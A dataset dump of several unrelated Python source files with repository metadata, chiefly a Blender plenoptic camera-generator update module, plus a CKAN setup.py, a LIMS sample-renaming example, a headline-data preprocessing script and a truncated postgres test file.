@application_in_state(is_major_editable=True)
@authorised_to_view_application(ExporterUser)
def post(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
return upload_goods_type_document(goods_type, request.data)
@transaction.atomic
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@authorised_to_view_application(ExporterUser)
def delete(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
if not goods_type:
return JsonResponse(data={"error": "No such goods type"}, status=status.HTTP_400_BAD_REQUEST)
return delete_goods_type_document(goods_type)
| true | true |
f725e3b94ce4f481a86a65896844cc39a93fc830 | 14,044 | py | Python | Blender_CamGen/update.py | Arne-Petersen/Plenoptic-Simulation | 7ca4923eacef16f0282daa511680fb28735eecfa | [
"MIT"
] | 28 | 2018-05-04T13:08:32.000Z | 2022-03-10T10:42:17.000Z | Blender_CamGen/update.py | Arne-Petersen/Plenoptic-Simulation | 7ca4923eacef16f0282daa511680fb28735eecfa | [
"MIT"
] | 14 | 2020-01-14T10:04:38.000Z | 2021-11-10T05:27:29.000Z | Blender_CamGen/update.py | Arne-Petersen/Plenoptic-Simulation | 7ca4923eacef16f0282daa511680fb28735eecfa | [
"MIT"
] | 10 | 2018-09-13T05:50:30.000Z | 2021-05-18T10:19:58.000Z | import bpy
import math
import mathutils
from os import listdir
from os.path import isfile, join
from . raytracer import sensor_position_for_distance
from . import calc
from . import create
from . import data
# ------------------------------------------------------------------------
# Helper functions
# ------------------------------------------------------------------------
# scans the lens folder for csv files containing lens data. The files are then listed in the objective list selector.
def find_items(self, context):
# check if list was already created
if (not data.objective_list_created):
# get all files in the lenses dir
lensfiles = [f for f in listdir(data.lens_directory) if isfile(join(data.lens_directory, f))]
lensfiles.sort()
result = ()
counter = 0
for lensfile in lensfiles:
# check if file ends with .csv
file_ending = lensfile[-3:]
if file_ending == "csv":
# find "_" which separates lens name and author/company name
separator = lensfile.find("_")
# add objective entry to list
result = result + (('OBJECTIVE_'+str(counter),lensfile[:separator],lensfile),)
counter = counter + 1
data.objective_list_created = True
data.objective_list = result
return data.objective_list
# ------------------------------------------------------------------------
# Update functions
# ------------------------------------------------------------------------
def objective_scale(self, context):
return
def lens_creation_method(self,context):
data.lens_creation_method = bpy.data.scenes[0].camera_generator.prop_lens_creation_method
def sensor(self, context):
cg = bpy.data.scenes[0].camera_generator
# rescale diffusor plane
if 'Diffusor Plane' in bpy.data.objects:
bpy.data.objects['Diffusor Plane'].scale[1] = cg.prop_sensor_width / 1000.0
bpy.data.objects['Diffusor Plane'].scale[2] = cg.prop_sensor_height / 1000.0
# adjust render resolution assuming square pixels
bpy.data.scenes[0].render.resolution_x = cg.prop_sensor_width / cg.prop_pixel_size
bpy.data.scenes[0].render.resolution_y = cg.prop_sensor_height / cg.prop_pixel_size
# rescale orthographic camera
if 'Orthographic Camera' in bpy.data.objects:
bpy.data.cameras['Orthographic Camera'].ortho_scale = max(cg.prop_sensor_width, cg.prop_sensor_height) / 1000.0
# rescale MLA to sensor size
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].scale[1] = cg.prop_sensor_width / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[1])
bpy.data.objects['Two Plane Model'].scale[2] = cg.prop_sensor_height / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[2])
temp_object = bpy.context.active_object
bpy.context.active_object.select_set(False)
bpy.data.objects['Two Plane Model'].select_set(True)
bpy.ops.object.transform_apply(location = False, scale = True, rotation = False)
bpy.data.objects['Two Plane Model'].select_set(False)
temp_object.select_set(True)
if 'MLA Hex Material' in bpy.data.materials:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
if 'MLA Rect Material' in bpy.data.materials:
bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
def sensor_width(self, context):
sensor(self,context)
def sensor_height(self, context):
sensor(self,context)
def pixel_size(self, context):
sensor(self, context)
def sensor_mainlens_distance(self, context):
cg = bpy.data.scenes[0].camera_generator
# move sensor
if 'Sensor' in bpy.data.objects:
bpy.data.objects['Sensor'].location[0] = cg.prop_sensor_mainlens_distance / 1000.0
# move MLA
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].location[0] = cg.prop_sensor_mainlens_distance / 1000.0 - cg.prop_mla_sensor_dist / 1000.0
def aperture_blades(self, context):
if 'Aperture Plane' in bpy.data.objects:
create.aperture()
def aperture_size(self, context):
if 'Opening' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
bpy.data.objects['Opening'].scale[1] = cg.prop_aperture_size / 1000.0
bpy.data.objects['Opening'].scale[2] = cg.prop_aperture_size / 1000.0
data.semi_aperture = cg.prop_aperture_size / 2000.0
def aperture_angle(self, context):
if 'Opening' in bpy.data.objects:
bpy.data.objects['Opening'].rotation_euler[0] = bpy.data.scenes[0].camera_generator.prop_aperture_angle/180.0*math.pi
def wavelength(self,context):
if data.glass_data_known == False:
# reset wavelength since not all glass materials are known
if abs(bpy.data.scenes[0].camera_generator.prop_wavelength - 587.6) > 0.01:
bpy.data.scenes[0].camera_generator.prop_wavelength = 587.6
return
# check whether objective is available
if len(data.objective) == 0:
return
else:
wavelength_um = bpy.data.scenes[0].camera_generator.prop_wavelength/1000.0
iors = []
for lens in data.objective:
if lens['material'] == 'air' or lens['material'] == 'Air':
iors.append(1.0)
else:
new_ior = calc.ior(lens['material'], wavelength_um)
if new_ior == None:
iors.clear()
break
else:
iors.append(new_ior)
if len(iors) > 0:
counter = 0
for lens in data.objective:
lens['ior_wavelength'] = iors[counter]
counter = counter + 1
for i in range(len(data.objective)-1, 0, -1):
data.objective[i]['ior_ratio'] = data.objective[i-1]['ior_wavelength']/data.objective[i]['ior_wavelength']
data.objective[0]['ior_ratio'] = 1.0/data.objective[0]['ior_wavelength']
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
bpy.data.materials[object.material_slots[0].name].node_tree.nodes['IOR'].outputs[0].default_value = lens['ior_ratio']
def fresnel_reflection_enabled(self,context):
# check whether objective is available
if (len(data.objective) == 0) or (not self.prop_fresnel_transmission_enabled):
return
else:
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
material = bpy.data.materials[object.material_slots[0].name]
if self.prop_fresnel_reflection_enabled:
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[0]=1
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[1]=1
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[2]=1
else:
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[0]=0
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[1]=0
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[2]=0
def fresnel_transmission_enabled(self,context):
# check whether objective is available
if len(data.objective) == 0:
return
else:
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
material = bpy.data.materials[object.material_slots[0].name]
if self.prop_fresnel_transmission_enabled:
material.node_tree.links.new(material.node_tree.nodes['Mix Shader'].outputs[0],material.node_tree.nodes['Material Output'].inputs[0])
else:
material.node_tree.links.new(material.node_tree.nodes['Refraction BSDF'].outputs[0],material.node_tree.nodes['Material Output'].inputs[0])
fresnel_reflection_enabled(self,context)
def mla_enabled(self, context):
hide = not bpy.data.scenes[0].camera_generator.prop_mla_enabled
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].hide_render = hide
bpy.data.objects['Two Plane Model'].hide_viewport = hide
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].hide_render = hide
bpy.data.objects['MLA'].hide_viewport = hide
data.use_mla = not hide
if data.use_mla:
sensor(self, context)
def microlens_diam(self, context):
if 'MLA Hex Material' in bpy.data.materials:
# set microlens size
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Microlens Diameter in um'].outputs['Value'].default_value = bpy.data.scenes[0].camera_generator.prop_microlens_diam
bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens Diameter in um'].outputs['Value'].default_value = bpy.data.scenes[0].camera_generator.prop_microlens_diam
def mla_sensor_dist(self, context):
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].location[0] = bpy.data.objects['Sensor'].location[0] - bpy.data.scenes[0].camera_generator.prop_mla_sensor_dist / 1000.0
def ml_type_1_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
# get currently active MLA type
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 1 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def ml_type_2_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
# get currently active MLA type
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_2_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
def ml_type_3_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
# get currently active MLA type
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_3_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def three_ml_types(self, context):
cg = bpy.data.scenes[0].camera_generator
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
else:
if cg.prop_mla_type == 'RECT':
cg.prop_three_ml_types = False
def mla_type(self, context):
cg = bpy.data.scenes[0].camera_generator
# get currently active MLA type
is_hex_mla = (cg.prop_mla_type == 'HEX')
# set materials
if is_hex_mla:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Hex Material']
else:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Rect Material']
ml_type_1_f(self,context)
cg.prop_three_ml_types = False
three_ml_types(self,context)
def focus_distance(self, context):
if 'MLA' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
# calculate the new sensor distance
sensor_position = sensor_position_for_distance(cg.prop_focus_distance / 100.0)
if sensor_position != -1.0:
cg.prop_sensor_mainlens_distance = sensor_position * 1000.0
sensor_mainlens_distance(self, context)
# set the calibration pattern to new distance
if 'Calibration Pattern' in bpy.data.objects:
calibration_pattern = bpy.data.objects['Calibration Pattern']
translation = mathutils.Vector((-bpy.data.scenes[0].camera_generator.prop_focus_distance / 100.0, 0.0, 0.0))
translation.rotate(calibration_pattern.rotation_euler)
calibration_pattern.location = translation | 48.09589 | 180 | 0.641698 | import bpy
import math
import mathutils
from os import listdir
from os.path import isfile, join
from . raytracer import sensor_position_for_distance
from . import calc
from . import create
from . import data
def find_items(self, context):
if (not data.objective_list_created):
lensfiles = [f for f in listdir(data.lens_directory) if isfile(join(data.lens_directory, f))]
lensfiles.sort()
result = ()
counter = 0
for lensfile in lensfiles:
file_ending = lensfile[-3:]
if file_ending == "csv":
separator = lensfile.find("_")
result = result + (('OBJECTIVE_'+str(counter),lensfile[:separator],lensfile),)
counter = counter + 1
data.objective_list_created = True
data.objective_list = result
return data.objective_list
def objective_scale(self, context):
return
def lens_creation_method(self,context):
data.lens_creation_method = bpy.data.scenes[0].camera_generator.prop_lens_creation_method
def sensor(self, context):
cg = bpy.data.scenes[0].camera_generator
if 'Diffusor Plane' in bpy.data.objects:
bpy.data.objects['Diffusor Plane'].scale[1] = cg.prop_sensor_width / 1000.0
bpy.data.objects['Diffusor Plane'].scale[2] = cg.prop_sensor_height / 1000.0
bpy.data.scenes[0].render.resolution_x = cg.prop_sensor_width / cg.prop_pixel_size
bpy.data.scenes[0].render.resolution_y = cg.prop_sensor_height / cg.prop_pixel_size
if 'Orthographic Camera' in bpy.data.objects:
bpy.data.cameras['Orthographic Camera'].ortho_scale = max(cg.prop_sensor_width, cg.prop_sensor_height) / 1000.0
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].scale[1] = cg.prop_sensor_width / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[1])
bpy.data.objects['Two Plane Model'].scale[2] = cg.prop_sensor_height / (1000.0 * bpy.data.objects['Two Plane Model'].dimensions[2])
temp_object = bpy.context.active_object
bpy.context.active_object.select_set(False)
bpy.data.objects['Two Plane Model'].select_set(True)
bpy.ops.object.transform_apply(location = False, scale = True, rotation = False)
bpy.data.objects['Two Plane Model'].select_set(False)
temp_object.select_set(True)
if 'MLA Hex Material' in bpy.data.materials:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
bpy.data.materials['MLA Hex Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
if 'MLA Rect Material' in bpy.data.materials:
bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Width in mm'].outputs['Value'].default_value = cg.prop_sensor_width
bpy.data.materials['MLA Rect Material'].node_tree.nodes['MLA Height in mm'].outputs['Value'].default_value = cg.prop_sensor_height
def sensor_width(self, context):
sensor(self,context)
def sensor_height(self, context):
sensor(self,context)
def pixel_size(self, context):
sensor(self, context)
def sensor_mainlens_distance(self, context):
cg = bpy.data.scenes[0].camera_generator
if 'Sensor' in bpy.data.objects:
bpy.data.objects['Sensor'].location[0] = cg.prop_sensor_mainlens_distance / 1000.0
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].location[0] = cg.prop_sensor_mainlens_distance / 1000.0 - cg.prop_mla_sensor_dist / 1000.0
def aperture_blades(self, context):
if 'Aperture Plane' in bpy.data.objects:
create.aperture()
def aperture_size(self, context):
if 'Opening' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
bpy.data.objects['Opening'].scale[1] = cg.prop_aperture_size / 1000.0
bpy.data.objects['Opening'].scale[2] = cg.prop_aperture_size / 1000.0
data.semi_aperture = cg.prop_aperture_size / 2000.0
def aperture_angle(self, context):
if 'Opening' in bpy.data.objects:
bpy.data.objects['Opening'].rotation_euler[0] = bpy.data.scenes[0].camera_generator.prop_aperture_angle/180.0*math.pi
def wavelength(self,context):
if data.glass_data_known == False:
if abs(bpy.data.scenes[0].camera_generator.prop_wavelength - 587.6) > 0.01:
bpy.data.scenes[0].camera_generator.prop_wavelength = 587.6
return
if len(data.objective) == 0:
return
else:
wavelength_um = bpy.data.scenes[0].camera_generator.prop_wavelength/1000.0
iors = []
for lens in data.objective:
if lens['material'] == 'air' or lens['material'] == 'Air':
iors.append(1.0)
else:
new_ior = calc.ior(lens['material'], wavelength_um)
if new_ior == None:
iors.clear()
break
else:
iors.append(new_ior)
if len(iors) > 0:
counter = 0
for lens in data.objective:
lens['ior_wavelength'] = iors[counter]
counter = counter + 1
for i in range(len(data.objective)-1, 0, -1):
data.objective[i]['ior_ratio'] = data.objective[i-1]['ior_wavelength']/data.objective[i]['ior_wavelength']
data.objective[0]['ior_ratio'] = 1.0/data.objective[0]['ior_wavelength']
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
bpy.data.materials[object.material_slots[0].name].node_tree.nodes['IOR'].outputs[0].default_value = lens['ior_ratio']
def fresnel_reflection_enabled(self,context):
if (len(data.objective) == 0) or (not self.prop_fresnel_transmission_enabled):
return
else:
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
material = bpy.data.materials[object.material_slots[0].name]
if self.prop_fresnel_reflection_enabled:
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[0]=1
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[1]=1
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[2]=1
else:
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[0]=0
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[1]=0
material.node_tree.nodes['Reflection BSDF'].inputs['Color'].default_value[2]=0
def fresnel_transmission_enabled(self,context):
if len(data.objective) == 0:
return
else:
for lens in data.objective:
for object in bpy.data.objects:
if object.name == lens['name']:
material = bpy.data.materials[object.material_slots[0].name]
if self.prop_fresnel_transmission_enabled:
material.node_tree.links.new(material.node_tree.nodes['Mix Shader'].outputs[0],material.node_tree.nodes['Material Output'].inputs[0])
else:
material.node_tree.links.new(material.node_tree.nodes['Refraction BSDF'].outputs[0],material.node_tree.nodes['Material Output'].inputs[0])
fresnel_reflection_enabled(self,context)
def mla_enabled(self, context):
hide = not bpy.data.scenes[0].camera_generator.prop_mla_enabled
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].hide_render = hide
bpy.data.objects['Two Plane Model'].hide_viewport = hide
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].hide_render = hide
bpy.data.objects['MLA'].hide_viewport = hide
data.use_mla = not hide
if data.use_mla:
sensor(self, context)
def microlens_diam(self, context):
if 'MLA Hex Material' in bpy.data.materials:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Microlens Diameter in um'].outputs['Value'].default_value = bpy.data.scenes[0].camera_generator.prop_microlens_diam
bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens Diameter in um'].outputs['Value'].default_value = bpy.data.scenes[0].camera_generator.prop_microlens_diam
def mla_sensor_dist(self, context):
if 'MLA' in bpy.data.objects:
bpy.data.objects['MLA'].location[0] = bpy.data.objects['Sensor'].location[0] - bpy.data.scenes[0].camera_generator.prop_mla_sensor_dist / 1000.0
def ml_type_1_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 1 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
bpy.data.materials['MLA Rect Material'].node_tree.nodes['Microlens f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def ml_type_2_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_2_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 2 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
def ml_type_3_f(self, context):
if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_3_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def three_ml_types(self, context):
cg = bpy.data.scenes[0].camera_generator
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
else:
if cg.prop_mla_type == 'RECT':
cg.prop_three_ml_types = False
def mla_type(self, context):
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Hex Material']
else:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Rect Material']
ml_type_1_f(self,context)
cg.prop_three_ml_types = False
three_ml_types(self,context)
def focus_distance(self, context):
if 'MLA' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
sensor_position = sensor_position_for_distance(cg.prop_focus_distance / 100.0)
if sensor_position != -1.0:
cg.prop_sensor_mainlens_distance = sensor_position * 1000.0
sensor_mainlens_distance(self, context)
if 'Calibration Pattern' in bpy.data.objects:
calibration_pattern = bpy.data.objects['Calibration Pattern']
translation = mathutils.Vector((-bpy.data.scenes[0].camera_generator.prop_focus_distance / 100.0, 0.0, 0.0))
translation.rotate(calibration_pattern.rotation_euler)
calibration_pattern.location = translation | true | true |
f725e3d6c35a6ace2f3a7fec8105649f2c8fe230 | 928 | py | Python | setup.py | datopian/ckanext-datajson | 808b211ba50e681e3b146c76443c456262836d0f | [
"CC0-1.0"
] | 7 | 2019-11-18T12:00:04.000Z | 2020-04-23T16:50:05.000Z | setup.py | datopian/ckanext-datajson | 808b211ba50e681e3b146c76443c456262836d0f | [
"CC0-1.0"
] | 3 | 2019-12-19T17:24:14.000Z | 2019-12-30T16:37:41.000Z | setup.py | datopian/ckanext-datajson | 808b211ba50e681e3b146c76443c456262836d0f | [
"CC0-1.0"
] | 2 | 2020-01-10T07:00:08.000Z | 2020-01-11T17:17:51.000Z | from setuptools import setup, find_packages
import sys, os
version = '0.5.1'
setup(
name='ckanext-datajson',
version=version,
description="CKAN extension to generate /data.json",
long_description="""\
""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='U.S. Department of Health & Human Services',
author_email='',
url='http://www.healthdata.gov',
license='Public Domain',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
namespace_packages=['ckanext', 'ckanext.datajson'],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points=\
"""
[ckan.plugins]
datajson=ckanext.datajson.plugin:DataJsonPlugin
datajson_harvest=ckanext.datajson.harvester_datajson:DataJsonHarvester
cmsdatanav_harvest=ckanext.datajson.harvester_cmsdatanavigator:CmsDataNavigatorHarvester
""",
)
| 28.121212 | 90 | 0.755388 | from setuptools import setup, find_packages
import sys, os
version = '0.5.1'
setup(
name='ckanext-datajson',
version=version,
description="CKAN extension to generate /data.json",
long_description="""\
""",
classifiers=[],
keywords='',
author='U.S. Department of Health & Human Services',
author_email='',
url='http://www.healthdata.gov',
license='Public Domain',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
namespace_packages=['ckanext', 'ckanext.datajson'],
include_package_data=True,
zip_safe=False,
install_requires=[
],
entry_points=\
"""
[ckan.plugins]
datajson=ckanext.datajson.plugin:DataJsonPlugin
datajson_harvest=ckanext.datajson.harvester_datajson:DataJsonHarvester
cmsdatanav_harvest=ckanext.datajson.harvester_cmsdatanavigator:CmsDataNavigatorHarvester
""",
)
| true | true |
f725e4f38e778a0e50ae9528f3771e4a2929df2b | 839 | py | Python | examples/set_sample_name.py | Molmed/genologics | 23d80bf67f6f376d218643f470e4f59c35301503 | [
"MIT"
] | null | null | null | examples/set_sample_name.py | Molmed/genologics | 23d80bf67f6f376d218643f470e4f59c35301503 | [
"MIT"
] | 2 | 2021-03-29T07:45:41.000Z | 2021-04-07T11:07:13.000Z | examples/set_sample_name.py | Molmed/genologics | 23d80bf67f6f376d218643f470e4f59c35301503 | [
"MIT"
] | 1 | 2017-12-01T09:47:48.000Z | 2017-12-01T09:47:48.000Z | """Python interface to GenoLogics LIMS via its REST API.
Example usage: Set the name and a UDF of a sample.
Per Kraulis, Science for Life Laboratory, Stockholm, Sweden.
"""
from genologics.lims import *
# Login parameters for connecting to a LIMS instance.
from genologics.config import BASEURI, USERNAME, PASSWORD
# Create the LIMS interface instance, and check the connection and version.
lims = Lims(BASEURI, USERNAME, PASSWORD)
lims.check_version()
# Get the sample with the given LIMS identifier, and output its current name.
sample = Sample(lims, id='JGR58A21')
print(sample, sample.name)
sample.name = 'Joels extra-proper sample-20'
# Set the value of one of the UDFs
sample.udf['Emmas field 2'] = 5
for key, value in list(sample.udf.items()):
print(' ', key, '=', value)
sample.put()
print('Updated sample', sample)
| 26.21875 | 77 | 0.740167 |
from genologics.lims import *
from genologics.config import BASEURI, USERNAME, PASSWORD
lims = Lims(BASEURI, USERNAME, PASSWORD)
lims.check_version()
sample = Sample(lims, id='JGR58A21')
print(sample, sample.name)
sample.name = 'Joels extra-proper sample-20'
sample.udf['Emmas field 2'] = 5
for key, value in list(sample.udf.items()):
print(' ', key, '=', value)
sample.put()
print('Updated sample', sample)
| true | true |
f725e59d66a1d6603562790280eee92932029c00 | 1,337 | py | Python | data_preprocessing_scripts/preprocess.py | SatyaSiddharthDash/headlinegen | ec11cb4b4dd4e6dce553c787cf31670a83f1c650 | [
"MIT"
] | null | null | null | data_preprocessing_scripts/preprocess.py | SatyaSiddharthDash/headlinegen | ec11cb4b4dd4e6dce553c787cf31670a83f1c650 | [
"MIT"
] | null | null | null | data_preprocessing_scripts/preprocess.py | SatyaSiddharthDash/headlinegen | ec11cb4b4dd4e6dce553c787cf31670a83f1c650 | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.model_selection import train_test_split
random_state = 100
data = pd.read_csv("~/headlinegen/data/nytime_front_page.csv")
data['title'] = data['title'].apply(lambda x: ' '.join(x.split(' ')[:-5]))
lens = data["content"].apply(lambda x: len(x.split(" "))).nlargest(10)
print(
f'max_input_len = {data["content"].apply(lambda x: len(x.split(" "))).min()}')
print(
f'max_output_len = {data["title"].apply(lambda x: len(x.split(" "))).max()}')
print(lens)
# train, valid_test = train_test_split(data,
# test_size=0.2,
# random_state=random_state,
# shuffle=True)
# valid, test = train_test_split(valid_test,
# test_size=0.5,
# random_state=random_state,
# shuffle=True)
# print(train.shape, valid.shape, test.shape)
# for dataset, prefix in zip([train, valid, test], ['train', 'val', 'test']):
# for columnname, suffix in zip(['content', 'title'], ['source', 'target']):
# filename = "/Users/satyasiddharthdash/headlinegen/data/nytimes/" + prefix + '.' + suffix
# with open(filename, 'w') as outfile:
# outfile.write(dataset[columnname].str.cat(sep='\n'))
| 38.2 | 98 | 0.562453 | import pandas as pd
from sklearn.model_selection import train_test_split
random_state = 100
data = pd.read_csv("~/headlinegen/data/nytime_front_page.csv")
data['title'] = data['title'].apply(lambda x: ' '.join(x.split(' ')[:-5]))
lens = data["content"].apply(lambda x: len(x.split(" "))).nlargest(10)
print(
f'max_input_len = {data["content"].apply(lambda x: len(x.split(" "))).min()}')
print(
f'max_output_len = {data["title"].apply(lambda x: len(x.split(" "))).max()}')
print(lens)
| true | true |
f725e5b14deab24e3329989fdf04feb3afb579fb | 6,848 | py | Python | tests/test_pg_connect.py | ktechboston/db_utils | b6e7787be832a79fc21ec63aa0860a50871cc227 | [
"MIT"
] | 1 | 2019-07-20T01:43:02.000Z | 2019-07-20T01:43:02.000Z | tests/test_pg_connect.py | ktechboston/db_utils | b6e7787be832a79fc21ec63aa0860a50871cc227 | [
"MIT"
] | 5 | 2019-07-15T14:21:28.000Z | 2019-07-24T20:09:25.000Z | tests/test_pg_connect.py | ktechboston/db_utils | b6e7787be832a79fc21ec63aa0860a50871cc227 | [
"MIT"
] | 1 | 2019-06-24T02:29:55.000Z | 2019-06-24T02:29:55.000Z | import unittest
import sys
import os
import csv
import psycopg2
from pprint import pprint
sys.path.insert(0, '..')
from db_utils.pg_connect import pg_connect
config_file = 'databases.conf'
db = pg_connect('postgres', config_file)
table = 'test_table'
class test_pg_connect(unittest.TestCase):
def setUp(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
db.update_db('CREATE TABLE IF NOT EXISTS test_table(name VARCHAR);')
db.update_db('DROP TABLE IF EXISTS csv_test_table')
def tearDown(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
def test_updatedb(self):
insert1 = db.update_db('''
INSERT INTO test_table(name)
